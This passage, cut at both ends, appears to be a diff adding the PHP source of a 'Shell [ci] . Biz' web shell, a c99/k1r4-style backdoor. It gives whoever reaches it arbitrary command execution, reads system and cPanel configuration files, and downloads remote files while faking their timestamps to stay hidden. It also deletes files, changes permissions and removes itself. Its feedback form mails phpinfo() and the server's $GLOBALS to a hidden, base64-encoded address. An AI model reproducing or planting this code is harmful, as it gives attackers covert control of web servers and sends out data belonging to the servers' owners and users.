color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using Shell [ci] . Biz".$shver."!"; k1r4exit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = k1r4_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("ZnJlZXNoZWxsNTEwQGdtYWlsLmNvbQ=="); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "Shell [ci] . Biz".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"Shell [ci] . Biz".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {k1r4fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); k1r4_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); k1r4_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} k1r4_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); k1r4_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + k1r4_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + k1r4_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + k1r4_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; k1r4exit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" 